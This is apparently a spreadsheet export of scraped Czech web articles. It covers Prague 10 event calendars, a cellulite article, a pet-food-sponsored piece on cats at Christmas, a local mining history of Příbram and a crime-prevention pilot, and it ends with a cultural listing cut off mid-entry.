KLUB K2, O. P. S. Ostružinová 9, 106 00, Praha 10, tel.: 723 824 703, www.klubk2.cz, rezervace míst: rc@klubk2.cz 19/12 15.30–16.15 Dílna pro děti: Vševěda – Den a noc Každý pátek 9.30–11.30 Rodinný klub v Ostružiní INTEGRAČNÍ CENTRUM PRAHA, O. P. S. Žitná 1574/51, 110 00 Praha 1, www.icpraha.com, Tel.: 777 867 861, sitovani@icpraha.com Středa/Середа 15.30–17.00 Klubík pro rodiče s dětmi (3–6 let) / Клуб для батьків з дітьми (3–6 років) SPORTOVNÍ AKCE — badminton BADMINTON ARÉNA SKALKA Budova OC Tesco, Přetlucká 3295/50, www.baskalka.cz 8/12 9.00 Mikulášský turnaj pro všechny děti Registrace: akce@baskalka.cz, 704 735 550 — volejbal PVK OLYMP PRAHA Sportovní hala Přípotoční, Přípotoční 30, www.pvk-olymp.cz 7/12 10.00 a 14.00 PVK Olymp – Dukla Liberec 14/12 17.00 PVK Olymp – TJ Ostrava — hokej HC SLAVIA PRAHA Zimní stadion Eden , Vladivostocká 1460/10 www.hc-slavia.cz 6/12 18.00 Slavia – Přerov 7/12 15.00 Slavia – Vsetín 15/12 15.00 Slavia – Jihlava 21/12 15.00 Slavia – Chomutov 29/12 15.00 Slavia – Sokolov — florbal BUTCHIS FLOORBALL CLUB Sportovní hala VŠE , Na Třebešíně 1 www.butchis.cz 8/12 18.00 Butchis – FBŠ Hummel Hattrick Brno 21/12 18.00 Butchis – Goldea Panters Otrokovice AKCE PRO SENIORY KLUB REMEDIUM Táboritská 22, T: 222 712 940, remedium.cz Otevírací doba září: út–st 10.00–16.00, čt 9.00–14.00 4/12 10.00-–14.00 Technická poradna nutná rezervace: 222 712 940 9/12 začíná zápis do kurzů jarního semestru (únor–květen) 11/12 od 9.30 Klub výletníků setkání s domluvou společného výletu nebo procházky 11/12 od 11.00 Kulturní klub setkání s domluvou návštěvy kulturní akce 18/12 od 14.00 Vánoční posezení CENTRUM ELPIDA Na Bělidle 34, centrum.elpida.cz Na lekce je nutné se přihlásit na webu, info@elpida.cz nebo na telefonu 272 701 335. každé po 15.45–17.15 Němčina: začátečníci plus každý čt 11.00–12.00 Jemná jóga pro seniory 5/12 10.00–11.30 Exkurze do Archivu hlavního města Prahy 5/12 14.00–15.30 Opera žije! Naděje české opery 10/12 15.00–18.00 Adventní setkání: Zdobení stromečku a zpívání koled se svařákem 11/12 9.45–11.45 Přednáška o historii pražských trhů 11/12 12.30–13.30 Focení a natáčení mobilem 12/12 15.30–17.00 Zábavný tipovací kvíz: Věda a technika 19/12 14.00–15.30 Mozek v kondici: tréninkové metody POINT 50+, O. P. S. Ostružinová 3, ww.point−500.webnode.cz 5/12 15.00 Adventní koncert posluchačů Hudební fakulty AMU nutná rezervace na tel.: 731 774 172 POLOVINA NEBE Klub pro seniory, Sámova 7, Praha 10 , www.polovinanebe.cz každou st 13.00–15.00 Kurzy IT pro seniory na Praze 10 Poslední letošní výuka proběhne 11. 12. Přihlášení a kontakt: 603 836 710 nebo koordinace@polovinanebe.cz AMELIE, Z. S. Šaldova 15, Praha 8 – Karlín , praha@amelie-zs.cz, tel.: 739 001 123 4/12 16.30 Aromaterapie pro uvolnění 10/12 16.00 Večírek Amelie Pravidelné bezplatné aktivity pro onkologicky nemocné a jejich blízké KLUB K2, O. P. S. www.klubk2.cz 6/12 9.30–11.00 Mezigenerační dílna Klubu K2 Městská knihovna Zahradní Město RODINNÉ A KOMUNITNÍ CENTRUM JABLÍČKOV, Z. S. Počernická 524/64, Praha 10 – Malešice www.jablickov.cz / info@jablickov.cz / tel.: 734 703 201 od 4/12 od 18.45 Keramika pro dospělé (i seniory) cyklus tří lekcí KLUB VZÁJEMNÉ A VŠESTRANNÉ POMOCI, O. P. S. zelizko.petr@email.cz, tel.: 602 317 110 po–pá 15.00–22.00 Seniorbox – Klub seniorů vždy od 18.00 živá hudba; roh Kodaňské 24 a Slovinské 21 každou st 10.00–15.00 Právní poradna zdarma U Kanálky 5, Praha 2 SENIOR FITNES, Z. S. www.seniorfitnes.cz středa 11.30, pondělí 15.00 Cvičení na podložkách TJ Sokol Vršovice, Vršovické nám. 11 D. Černá 737 616 023, vyziva.dagmar@seznam.cz pondělí 9.30 Cvičení na židlích Infocentrum POINT 50+, Ostružinová 3 P. Navrátilová 774 308 961, ester.pavla@seznam.cz Další aktivity na www.seniorfitnes.cz OSTATNÍ ZŠ KARLA ČAPKA Kodaňská 658/16, www.zskarlacapka.cz 3/12 18.00 Pochop Krampusů ze školy na Čechovo nám. 10/12 18.00 Vánoční koncert při svíčkách v kostele sv. Václava ZUŠ BAJKALSKÁ Bajkalská 11, www.zus-bajkalska.cz 3/12 18.00 1. adventní koncert koncertní sál ZUŠ 11/12 17.30 2. adventní koncert Husův sbor, Moskevská 34 15/12 14.00 Adventní vystoupení ZUŠ na Pražském hradě 3. nádvoří Pražského hradu 19/12 18.00 3. adventní koncert koncertní sál ZUŠ</t>
  </si>
  <si>
    <t>20241201_383_3488111119_72a5d66e7e735748de77.html</t>
  </si>
  <si>
    <t>72a5d66e7e735748de77</t>
  </si>
  <si>
    <t>ŠTAMGASTI SUBCULTURE BEAT</t>
  </si>
  <si>
    <t>20241201_384_3473479151_ca1f94462e5090e8292d.html</t>
  </si>
  <si>
    <t>ca1f94462e5090e8292d</t>
  </si>
  <si>
    <t>Trápí i modelky a někdy i muže. Jak se vypořádat s celulitidou</t>
  </si>
  <si>
    <t>Trápí i modelky a někdy i muže. Jak se vypořádat s celulitidou Poznej svého nepřítele, říká se. V boji proti celulitidě toto rčení platí dvojnásob. Abyste ji porazili, je třeba přesně vědět, jak a proč vzniká. A samozřejmě, jak se jí účinně zbavit nebo jak ji aspoň redukovat. Ilustrační snímek | foto: Profimedia.cz Bohužel už sám fakt, že se narodíte jako žena, zvyšuje pravděpodobnost, že vaši kůži dříve či později „ozdobí“ pomerančové dolíčky. Postiženi bývají i muži, i když ne tak často. Je to dané tím, že ženám se v oblasti boků a stehen zkrátka tuk ukládá hojněji. Aktuální číslo Předplatné můžete objednávat zde Příslušnice něžného pohlaví navíc mají v pokožce méně pojivové tkáně, tím pádem je u nich vznik celulitidy běžnější. Příčiny vzniku Ke vzniku celulitidy dochází, když podkožní tukové buňky vlivem ukládání odpadních metabolických látek zvětší svůj objem, čímž narušují původní pravidelné struktury ve složení pokožky. Mění se tak uspořádání proteinových vláken, která se smršťují a vytvářejí nevzhledné hrbolky. Na vině nejčastěji bývá dědičnost, nedostatek pohybu a hormony. Proto se pomerančová kůže ráda objevuje v období těhotenství, menopauzy či vlivem některých léků. Stav se zhoršuje i během menstruace. Je libo květák Svou troškou do mlýna však může přispět i nevhodná strava plus dlouhodobě nízký příjem tekutin. Proto je na místě boj s celulitidou zahájit úpravou jídelníčku a pitného režimu. Doporučit lze především celozrnné a močopudné potraviny, jako jsou artyčoky, celer, baklažán, květák, chřest, jablka, broskve, melouny, hrušky či vodní meloun, a luštěniny. Tělu zároveň dopřejte dostatek tekutin, vlákniny a vitaminu A. Naopak omezte nasycené tuky, sůl i cukry a nechte si raději zajít chuť na alkohol ve všech jeho podobách. Velmi důležitý je také pohyb, i když sám o sobě jejímu rozvoji nezabrání ani už vzniklou celulitidu neodstraní. Pokud ale dojde k posílení a lepšímu prokrvení těla v oblasti hýždí, břicha a stehen, určitě docílíte toho, že pomerančovka na těchto partiích bude méně viditelná. Vhodné je především plavání, aerobik, tanec, jízda na kole, rekreační běh nebo svižná chůze. Celulitidu a strie napomůže zjemnit peeling. Nejenže kůži prokrví a odstraní z ní odumřelé buňky, ale také podporuje stimulaci tvorby kolagenu a elastinu. Jako velmi efektivní se ukazuje i léčba mrazem neboli takzvaný coolsculpting. Nejméně účinné bývají zpevňující krémy. Autor: Jana Třžilová Autor person Jana Tržilová</t>
  </si>
  <si>
    <t>20241201_385_3478174715_9a698c64b971235cd512.html</t>
  </si>
  <si>
    <t>9a698c64b971235cd512</t>
  </si>
  <si>
    <t>Kočičí Vánoce: jak udělat radost našim čtyřnohým kamarádům</t>
  </si>
  <si>
    <t>Kočičí Vánoce: jak udělat radost našim čtyřnohým kamarádům sdílejte: email tisk Co dát kočce k Vánocům? 01.12.2024 18:00, Autor: –gab- | Vánoce, čas klidu, rodinné pohody a samozřejmě i rozličných dobrot. Zatímco my lidé si můžeme dopřát téměř cokoliv, po čem naše srdce zatouží, musíme být opatrní, když chceme potěšit naše čtyřnohé přátele. Kočky, ačkoli jsou často zvědavé a rády ochutnají vše, co jim přijde pod nos, mají velmi specifické potřeby, které bychom měli respektovat. Rok co rok se v období svátků scházíme společně u jednoho stolu, kde si obvykle každý najdeme to své a pochutnáváme si na tradičních vánočních dobrotách. A právě v tomto období často podléháme pokušení nabídnout kousek toho dobrého i našim kočičím miláčkům. Vždyť ty velké, zářící oči a dojemné mňoukání dokážou roztavit i to nejtvrdší srdce. Avšak to, co chutná nám, nemusí být vhodné pro jejich citlivý trávicí systém. Mají kočky rády sladké? Stůl plný vánočního cukroví je lákavou podívanou nejen pro nás, ale i pro naše čtyřnohé přátele. Věděli jste, že sladké kočičkám sice voní, ale nikterak nechutná? "Kočky se obecně více orientují podle čichu než chuti, tudíž vánoční rohlíčky jim dozajista hezky voní, ale jejich sladkou chuť necítí. Navíc pro ně může být cukroví velmi těžko stravitelné, jako většina lidské stravy. Čokoláda, která se také velmi často objevuje na mísách plného cukroví, může být pro kočky až smrtelně jedovatá. Obsahuje látky nazývané methylxanthiny, které mohou způsobit zvracení, průjem, vysokou tělesnou teplotu, svalové třesy a mnohé další problémy," vysvětluje MVDr. Mária Macošková. Jaké další potraviny jsou pro kočičky nezdravé? Pokud jste při pečení zvyklí ochutnávat syrové těsto, vězte, že tento zvyk není zdravý ani pro vás, ani pro vašeho domácího mazlíčka. I malý kousek syrového těsta může u kočky způsobit zdravotní problémy. Podobně nebezpečné jsou pro kočky rozinky, které se často objevují na vánočním stole, a i pár kousků může vést k selhání ledvin. Nesmíme zapomínat ani na alkohol , který se vyskytuje v některých našich oblíbených pochoutkách a bez kterého by vánoční přípitek jako by nebyl. Ovšem i ten je pro kočky škodlivý a všechny potraviny a nápoje obsahující alkohol , jako například pivo , víno nebo kvašené těsto, představují pro kočky vážné zdravotní riziko. Vánoční hostina Je sice pravda, že kočky jsou zvědavé a rády ochutnají vše, co jim přijde pod nos, ale to neznamená, že naše štědrovečerní večeře je pro ně odměnou. Našim kočičím společníkům uděláte největší radost kvalitním krmivem, které obsahuje dostatečný počet živin pro jejich zdravý a spokojený život. "Na rozdíl od lidské stravy, která je pro kočky krajně nevhodná, je speciálně připravené krmivo navrženo tak, aby splňovalo všechny nutriční potřeby kočičího organismu. Ideálním krmivem může být například značka Shelma , jejíž produkty obsahují dostatek bílkovin, vitamínů a minerálů pro posílení imunitního systému kočky. Díky vysokému podílu masa a ryb poskytují tyto produkty kočkám kvalitní bílkoviny, aniž by byl objem krmiva navyšován sójou nebo obilím," radí MVDr. Mária Macošková. Pokud tedy chcete svojí kočičce zpříjemnit svátky vánoční, zvolte raději nějakou masovou kapsičku, která dozajista uspokojí její chuťové pohárky a zároveň posílí její zdraví. A nezapomeňte na malý dáreček pod stromeček! Ať už to bude nová hračka nebo zásoba jejího oblíbeného pamlsku, radost z překvapení bude nezapomenutelná. Nejdůležitější je však věnovat svému chlupatému kamarádovi dostatek lásky a péče. Společně strávený čas je tím nejlepším dárkem, který můžeme kočce dát. Foto: Depositphotos sledujte nás Autor: Autor: || TYDEN, www.tyden.cz, e-mail: webmaster@tyden.cz Rubrika transition_slide Relax</t>
  </si>
  <si>
    <t>2.79</t>
  </si>
  <si>
    <t>20241201_386_3473473259_c74b36fb3ef1148dbc38.html</t>
  </si>
  <si>
    <t>c74b36fb3ef1148dbc38</t>
  </si>
  <si>
    <t>Příběhy z Březového vrchu X.: hormistr Jakub Bittner</t>
  </si>
  <si>
    <t>Shrnutí Příběhy z Březového vrchu X.: hormistr Jakub Bittner Rubrika: HISTORIE Úřad hormistra nebyl po úmrtí Zikmunda Leopolda Štercéře za moru 1680 obsazen. Zemřelého štajgra Samuela Heinricha nahradil na podzim 1689 havíř Jan Nosek. Na dolování měl dohlížet primátor František Ferdinand Podlejší, který byl výběrčím pivního tácu určeného na rozvoj zdejších dolů. Vzhledem k primátorovu špatnému hospodaření nařídil v roce 1688 nejvyšší mincmistr František Karel hrabě Přehořovský z Kvasejovic obnovené městské radě, aby mu doporučila pro vybírání nápojové daně důvěryhodnějšího muže. Navrhla zlatníka a spoluradního Ludvíka Alise, protože se dobře chová a výborně rozumí jak štolám, do kterých se umí spustit a ve kterých dokáže všechno prozkoumat, tak i jiným hornickým věcem. Komora však s jeho jmenováním váhala. PRADĚD J. A. ALISE BYL OBVINĚN ZE ZABITÍ Francouz Louis de Alis, zvaný Zlatník, praděd známého hormistra Jana Antonína Alise, se narodil asi roku 1646 († 1720). Podle záznamu malostranské městské rady z 19. října 1671 přicestoval do Prahy společně s leutenantem habsburského pluku, kterému velel Francouz – maršál Jean - Louis Raduit de Souches . Leutenant se po příchodu do Prahy ztratil. Alis byl obviněn z jeho zabití a uvězněn na malostranské radnici v horním a později v dolním, přísnějším vězení. Teprve 26. dubna 1672 se věc vysvětlila. Alis byl propuštěn a 13. května rychtář vyhotovil atest o jeho nevině. V témže roce ale vojsko francouzského krále Ludvíka XIV. zaútočilo na habsburské Nizozemí , a tak se Francie stala nepřítelem habsburské monarchie a na maršála i Alise se pohlíželo s nedůvěrou. Vojevůdce Raduit de Souches se usadil na Moravě , Ludvík Alis zůstal v Čechách . Po příchodu do Příbrami roku 1675 nebo 1676 si tu pronajal byt v prvním patře výstavného domu na rynku (stojící čp. 144/I). Oženil se s Annou, dcerou radního Václava Šusty, od kterého dostal parcelu na rynku za kostelem tam, kde dnes stojí budova báňského ředitelství. Povolení ke stavbě nového domu a k udělení městského práva mu však královská komora vzhledem k politickým poměrům odmítala vydat pět let. I díky svým schopnostem se stal konšelem, přestože uměl špatně česky a němčinu neovládal vůbec. Magistrát v letech 1688 a 1689 ujišťoval nejvyššího mincmistra, že se obec o stříbrorudné doly postará a bude na jejich provoz podle starobylého příbramského zvyku přispívat k vybranému tácu dalšími 144 zlatými ročně. Úřadu nápojového tácu se tedy každý rok měla vykazovat investice do dolování ve výši 681 zlatých. Nápojovou daň dočasně spravoval nový primátor Václav Štrof , v červnu 1690 byl ustanoven výběrčím pivního a vinného tácu voskař a radní Filip Václav Wiesser. Poněvadž primátor Václav Štrof do poloviny července 1690 nepředložil účet nápojové daně za uplynulé pololetí, dokud ho česká komora neurgovala, nejvyšší mincmistr přestal magistrátu důvěřovat. Komora rozhodla, že městská správa bude od správy horních záležitostí opět oddělena. Dne 7. září 1690 ustanovil nejvyšší minc mistr hormistrem v Jílovém , Kníně a Příbrami německého horního odborníka Jakuba Bittnera, který se do Příbrami přestěhoval se svou manželkou Kateřinou, syny Josefem a Václavem z Kašperských Hor , kde působil asi rok. Ludvík Alis se krátce nato stal vzhledem „k vychválenému talentu“ císařským horním přísežným, hormistrovým nejbližším spolupracovníkem a nejmocnějším mužem březohorského knapšaftu. Nadále zůstal i vlivným příbramským konšelem. TAJNÝ DOVOZ PIVA A ŠPATNĚ UPEČENÉ PEČIVO Hormistr Jakub Bittner dostal od nejvyššího mincmistra příkaz, aby čtvrtletně podával zprávu o důležitém dění ve svých revírech. Pořídil si knihu, do které si své dekrety, zprávy a nařízení opisoval. Kritizoval v nich praktiky příbramských radních a jejich příbuzných při vaření a tajném dovozu piva a Wiessera pro nepoctivé vybírání nápojového tácu. Všímal si špatně upečeného pečiva. Když v listopadu 1690 vypukl ve městě požár, nebylo k nalezení hasičské náčiní. Každý měšťan také roku 1688 dostal dva sudy piva , aby odstranil své nebezpečné dřevěné komíny a nechal vyzdít cihlové, což se nestalo. Bittner oznámil komoře, že obyvatelé zanedbávají účast na bohoslužbách. Kritizovaní členové magistrátu si na hormistra opakovaně stěžovali. Křivě ho u nadřízených úřadů obvinili, že posílá úplatky nejvyššímu mincmistrovi. Ten hormistrovi začátkem října 1691 přikázal, aby se v městských věcech řídil pokyny radních, ale v úřadu ho ponechal a nařídil magistrátu nápravu oznámených nešvarů. Chudoba březohorských obyvatel, jejich nevýnosná pole, nedostatek dobytka a dobré vody, kterou prý na Březovém vrchu stahovaly štoly, takže se musela draze dovážet, byly důvodem, že se v roce 1692 hormistr Bittner znovu přimlouval za snížení jejich kontribuce. Ve svém líčení trochu přeháněl, ale dosáhl toho, že Březohorští pak dohromady platili kontribuci jen z jednoho usedlého. Už ale nedostávali od příbramské obce pivní přívarek. Hormistr záhy zjistil, že obnova těžby stříbra bude vyžadovat delší čas. V 1691 byly zastaveny práce v oblasti dolu Bohatá útěcha. Na ražbu hluboké štoly pod Svatou Horou nad Jezuitským rybníkem a mlýnem (dnešním Volákovým zahradnictvím) obec vinou primátora Podlejšího zbytečně vynaložila 700 zlatých. Horníci totiž po smrti šichtmistra Samuela Heinricha špatně hloubili šachtu, kterou neuměli propojit se štolou, a zdejší dílo opustili. Bittner určil jeho správný směr. Na nově objevené štole za Svatou Horou pracovali tři horníci s jedním učněm. Perk (jalovou skálu) dobývali ve třech trytlech (v trojsměnném provozu) a vyvážel ho zběhlý poddaný Kohoutek za týdenní plat 15 krejcarů. I ostatní čeští horníci byli zběhlí poddaní různých vrchností, vzhledem k těžké a nebezpečné hornické práci se nedařilo za zdejší malé mzdy zaměstnat zkušené německé havíře. ŠTOLU RAZILI TŘI MUŽI VE DVANÁCTIHODINOVÝCH ŠICHTÁCH V Příbrami objevil Jakub Bittner starou, hlubokou dědičnou štolu, dlouhou 800 láter (cca 1600 m), o které se do té doby nevědělo. Během přípravy vizitace dolů, plánované na jaro 1692, si s pomocí zlatníka Ludvíka Alise pořídil měřické náčiní, aby ji společně se slavkovským hormistrem mohl vyměřit. Na jeho návrh byla v oblasti Novoročního pásma založena stejnojmenná štola, později nazvaná po svatém Karlu Boromejském (nynější první patro březohorských dolů). Tuto štolu razili tři muži ve dvanáctihodinových šichtách. Týdenní plat horníka byl obvykle 1 zl. Hormistr pobíral z pivního tácu ročně 150 zl., tj. necelé 3 zl. týdně. V roce 1693 dal nad tzv. Cafourkovým mlýnem postavit nové kunsty – čerpadlo poháněné vodním kolem. Jakub Bittner tvrdil, že by si město, v němž tehdy bylo asi 144 domů, mělo z obrovských dluhů pomoct založením železárny. Od začátku 90. let zkoušel, zda by se železná ruda dala získávat z takzvaného železného klobouku, výplně oxidační zóny březohorských stříbronosných žil obsahujících i další kovy. Tyto pokusy nepřinesly dobrý výsledek. Poměrně hodnotná a snadno tavitelná železná ruda se však nacházela v nalezištích, patřících městu a nacházejících se v pásmu od Narysova a Žežic přes Brod , Hatě, Svatou Horu a Květnou k Hluboši. Alespoň zpočátku tam za ní nebylo ani nutné pronikat do velkých hloubek. Magistrát ale nedal na Bittnerovy rady a ve snaze po rychlém získání části peněz na dlužné daně ve výši 7000 zl. a vyplacení městského pivovaru z exekuce přenechal těžbu železné rudy svému sousedovi Jiřímu Humprechtovi rytíři Bechyňovi z Lažan na Hluboši. Obec mu pronajala pozemky s nalezišti na 50 let pouze za jednorázovou půjčku 700 zlatých a dalších 42 zlatých, které mu měla přidat jako šestiprocentní úrok z půjčené částky (!). Rytíř Bechyně ještě chtěl pro rozvoj své železárny koupit Krupičkovský mlýn, hraničící s jeho pozemky a postavený u nové příbramské hutě (nad dnešními Kovohutěmi) koncem 16. století, kdy nebylo pro tamní vodoteče využití. Magistrát se ohledně prodeje mlýna obrátil na českou komoru. Bittner se ale v hospodě „u trunku“ od Bechyňova správce dozvěděl, že tam rytíř chce stavět vysokou pec a hamr, a obratem o tom napsal nejvyššímu mincmistrovi, který s jeho odmítavým postojem k prodeji souhlasil. Vážil si totiž názoru Jakuba Bittnera, jenž v květnu 1699 předložil komoře dvě memoranda s rozumnými návrhy na rozšíření průmyslu a obchodu v Čechách a rozvoj hornictví a hutnictví. Komora odpověděla magistrátu, že je potřeba velké opatrnosti, protože odprodané nemovitosti se těžko získávají zpět a město Příbram by mohlo utrpět nenapravitelnou škodu. Hormistr se inspiroval Bechyňovým nápadem využít vodotečí u císařské hutě a Krupičkovského mlýna k vybudování obecního železářského závodu. Nový nejvyšší mincmistr Petr hrabě z Kokořova doporučil komoře tento projekt schválit, pokud se pro císařskou šmelcovnu uchovají huťský rybník, jez a vodní příkopy a příbramská obec bude používat jen stavební dříví a dřevěné uhlí ze svých lesů. ŽELEZNÁ PEC U VOKAČOVSKÉHO MLÝNA Pak nastaly obvyklé úřední průtahy, proto se Jakub Bittner na konci roku 1700 rozhodl po stavit železnou pec raději na pozemcích obecního Vokačovského mlýna, kde se pro ni a přilehlý hamr hned mohly využít mlýnské strouhy s nádržkou. Druhý hamr se měl postavit pod jižním koncem hráze císařského rybníka nad stříbrnou hutí. Nejvyšší mincmistr schválil Bittnerův návrh na začátku června 1702, kdy už byl závod ve výstavbě. Od roku 1703 řídil budování železárny Ludvík Alis. Na místo šichtmistra doporučil svého syna Matěje Václava Dismase (* asi 1682), který v letech 1694–1698 studoval na jezuitském gymnáziu v Březnici a nedávno se oženil s Veronikou, dcerou výběrčího tácu Wiessera. Mates Alis byl jmenován šichtmistrem 8. července 1704. Hormistr Jakub Bittner v polovině července 1704 zemřel v Praze . V Příbrami bydleli Bit tnerovi zřejmě v pronájmu, kde se jim v říjnu 1691 narodila dcera Anna. V květnu 1695 se narodil syn Jan Antonín . V roce 1700 Bittner napsal, že má tři syny, z nichž nejstarší začal 13. rok svého života, a že je zaučuje do hornictví. Už v březnu 1701 žádal komoru, aby byl nejstarší syn přijat na zkoušku jako vypírač zlata v Jílovém . Začátkem 20. let se v pramenech začíná objevovat zřejmě Jakubův prostřední syn Václav Bittner, šichtmistr obecnického železářského závodu, který dodal 10 vozů železa na stavbu březohorského kostelíka sv. Prokopa . Po smrti manželky Barbory, s níž měl tři děti, si na Štědrý den 1733 vzal Zuzanu Vondráškovou z Bohutína , kde se jim na konci února 1734 narodil syn Josef , pozdější prubíř a šichtmistr příbramských stříbrných hor. Jan Bittner, nejmladší Jakubův syn, se stal šmelcířem. V době, kdy bydlel se svou manželkou Kristinou v příbramské šmelcovně, se jim tam narodily čtyři děti. Příjmení Bittner se ve zdejším regionu objevuje dodnes. Titul Bittnerova rukopisného Protokolu. Foto (2×): SOkA Příbram Každý měšťan dostal dva sudy piva , aby odstranil nebezpečné dřevěné komíny a vyzdil cihlové, což se nestalo. První strana Bittnerova rukopisného Protokolu s Alisovou přísahou horního přísežného. Autor: Věra Smolová SOA v Praze – SOkA Příbram Autor person Věra Smolová Rubrika transition_slide HISTORIE</t>
  </si>
  <si>
    <t>20241201_387_3485008816_ca199c7913ca020b553b.html</t>
  </si>
  <si>
    <t>ca199c7913ca020b553b</t>
  </si>
  <si>
    <t>PILOTNÍ PROJEKT NOVÉ SLUŽBY V RÁMCI PREVENCE KRIMINALITY</t>
  </si>
  <si>
    <t>PILOTNÍ PROJEKT NOVÉ SLUŽBY V RÁMCI PREVENCE KRIMINALITY Městská část Praha 10 zavádí nový pilotní projekt zaměřený na zvýšení bezpečnosti a veřejného pořádku v městské části. Tento projekt byl navržen jako reakce na potřebu efektivního řešení problémových lokalit na základě podnětů od občanů, kteří upozorňovali na problémy v místech, jako je okolí stanic metra Skalka, Strašnická, obchodní centrum Eden a jeho okolí, kulturní dům Eden, sídliště Vlasta a točna tramvají u ulice Radošovická. Pracovníci pro bezpečnost a veřejný pořádek působí v těchto oblastech od začátku listopadu do konce prosince tohoto roku, aby monitorovali bezpečnostní situaci a v problémových situacích podporovali občany a spolupracovali s policií. Proč je služba potřeba? Podněty občanů ukazují na časté problémy s narušováním veřejného pořádku, znečišťováním prostoru nebo konzumací alkoholu na zakázaných místech. Hlavním posláním pracovníků pro bezpečnost a veřejný pořádek je: — monitorovat problematické oblasti a zvyšovat bezpečnost v jejich okolí, — snižovat nadměrný hluk a předcházet narušování veřejného pořádku, — bojovat proti užívání a distribuci omamných a psychotropních látek, — spolupracovat s městskou policií a dalšími orgány na řešení bezpečnostních situací, Důraz je kladen na neformální přístup k řešení problémů prostřednictvím domluvy a vyjednávání, což by mělo vést k vyšší efektivitě a snížení napětí v problémových situacích. „Tento projekt je reakcí na konkrétní problémy, které dlouhodobě trápí obyvatele Prahy 10. Věříme, že přítomnost pracovníků v terénu přispěje ke zlepšení situace a vytvoření bezpečnějšího prostředí pro všechny,“ uvedl Radek Lojda, místostarosta pro bezpečnost. Jak probíhá vyhodnocení? Pilotní fáze bude vyhodnocena na základě konkrétních výsledků a také zpětné vazby od občanů. Data získaná během této fáze poslouží jako jeden z podkladů při přípravě nové koncepce prevence kriminality. Tento pilotní projekt představuje inovativní způsob, jak reagovat na aktuální bezpečnostní výzvy v městských částech. Kombinace prevence, aktivní komunikace a spolupráce s veřejnými orgány vytváří nadějnou cestu ke zlepšení kvality života obyvatel na Praze 10 . „Naším cílem je zajistit, aby tento projekt byl řízen efektivně. Chceme, aby veškeré kroky vycházely z potřeb obyvatel a sloužily jejich zájmům,“ dodal místostarosta Radek Lojda.</t>
  </si>
  <si>
    <t>20241201_388_3485094574_d3e1dc392977f53dfdcf.html</t>
  </si>
  <si>
    <t>d3e1dc392977f53dfdcf</t>
  </si>
  <si>
    <t>Přehled kulturních událostí na měsíc prosinec</t>
  </si>
  <si>
    <t>Přehled kulturních událostí na měsíc prosinec Kulturní události Kultura s.r.o. Pelclovo divadlo • NADECHNOUT SE ŽIVOTA / David Hare Po 2. 12. 2024, 19.00 Psychologická hra. Manželka a milenka. Nastal čas osvobodit se od muže, který je opustil. Hrají: Jitka SMUTNÁ , Tereza BRODSKÁ . Režie: Šimon Dominik Uvádí: Divadlo Ungelt Praha Vstupné: 490, 470 Kč. Předprodej probíhá. • TANEČNÍ ODPOLEDNE čertovská Ne 8. 12. 2024, 14.00 K tanci hraje taneční skupina STUDIO MIX Vstupné: 100 Kč • PLES TANEČNÍCH So 28. 12. 2024, 20.00 Kapela Antree Vstupné: 200 Kč. Předprodej probíhá SPOLEČ. CENTRUM • TANEČNÍ ODPOLEDNE Ne 22. 12. 2024, 14.00 K tanci hraje taneční skupina COMBI Vstupné: 100 Kč • VELKÁ PŘEDSILVESTROVSKÁ TANČÍRNA Pá 27. 12. 2024, 20.00 Aneb Silvestr nanečisto, přijďte se rozloučit s rokem 2024 se svými přáteli, zatančit si. DJ Mirek Novotný Vstupné: 150 Kč. Rezervace: 604565372 PŘIPRAVUJEME • RADŮZA St 29. 1. 2025, 19.00 Koncert Vstupenky: 450 Kč/předprodej, 490 Kč/na místě. Předprodej probíhá KINO Blues, rock, soul podvečer s …. • CROSSROAD /CZ St 18. 12. 2024, 19.00 Kapela hrající blues-rock Jirka Adamec/ baskytara, Víťa Marek / kytara, zpěv, Tomáš Hroch / bicí, Leoš Sedláček / kytara, zpěv Vstupné: 320 Kč. Předprodej probíhá HOTEL STUDÁNKA • PRODLOUŽENÁ 8. 12. 2024, 18.00 Slavnostní zakončení tanečního kurzu Vstupné: 150 Kč (mimo kurzistů) Místo konání: Sál Rudolfa Rokla PŘIPRAVUJEME • MUZIKÁLY NARUBY 8. 8. 2025, 19.00 Místo konání: letní amfiteátr MĚSTSKÁ KNIHOVNA • OBRAZY PODLE BIBLE 20. 11. 2024. – 6. 1. 2025 Výstava - Josef Kejval HOTEL HAVEL • KULTURA S HAVLEM Při zakoupení vstupenky na rychnovskou kulturní akci, můžete v den akce od 16.00 do 19.00 využít 15% slevu v restauraci, kavárně či pivnici. • HOTELOVÁ PIVNICE Pátky a Soboty, 15.00 Na čepu pivní speciály a tradiční speciality k pivu . MC JÁJA • MIKULÁŠSKÁ BESÍDKA 5. 12. 2024, 9.00 Pro předem přihlášené (734377357) • VÁNOČNÍ TVOŘENÍ 10. 12. 2024, 10.00 – 11.30 • VÁNOČNÍ BESÍDKA 19. 12. 2024, 10.00 Pro předem přihlášené (734377357) • HERNA PRO RODIČE S DĚTMI Po – Čt, 9.00 – 11.30 MAS SPLAV AKCE PRO ŠKOLY • KOLEGIÁLNÍ PODPORA METODIKŮ PREVENCE 2. St. 4. 12. 2024, 15.00 – 17.00 Další kolegiální sdílení metodiků prevence v převážně supervizním modelu ZŠ Solnice, Dobrušská 81 • HRAVĚ S UMĚLOU INTELIGENCÍ St 11. 12. 2024, 13.30 – 16.30 Kreativní aktivity pro český jazyk a další předměty – inspirativní workshop pro učitele ZŠ. ZŠ Vamberk, Komenského 95 RŮZNÉ • ROZSVÍCENÍ VÁNOČNÍHO STROMU 1. 12. 2024, 17.00 – 17.30 Místo konání: U hasičské zbrojnice, Kvasiny • ROZSVĚCENÍ VÁNOČNÍHO STROMU 7. 12. 2024, 17.30 Účinkuje pěvecký sbor Rolnička (RDS) Místo konání: Solnice • JEŽÍŠKOVA SCHRÁNKA 1.– 13. 12. 2024 Do schránky mohou děti vhazovat svá vánoční přání Místo konání: Kvasiny u vánočního stromku RŮZNÉ • BETLÉMY NA ZÁMKU 30. 11. 2024 – 2. 2. 2025 14. ročník tradiční výstavy Místo konání: Zámecká galerie, Kvasiny • PRODEJNÍ VÝSTAVA KERAMIKY 2. 12. 2024 – 9. 1. 2025 Drobná vánoční keramika od keramičky Blanky Hruškové Vernisáž 2. 12. 2024, 17.00 Místo konání: Knihovna Častolovice • VÁNOČNÍ SHOW PRO DĚTI 8. 12. 2024, 16.00 – 17.30 Dvojice Gábina a Katka přijedou s kouzelným kapsářem plným hudebních překvapení. Vstupné: 50 Kč Místo konání: Kulturní dům Kvasiny • VÁNOČNÍ TRHY 8. 12. 2024, 9.00 – 15.00 Místo konání: Zámek Doudleby • ADVENTNÍ KONCERT 12. 12. 2024, 18.00 Komorní sbor 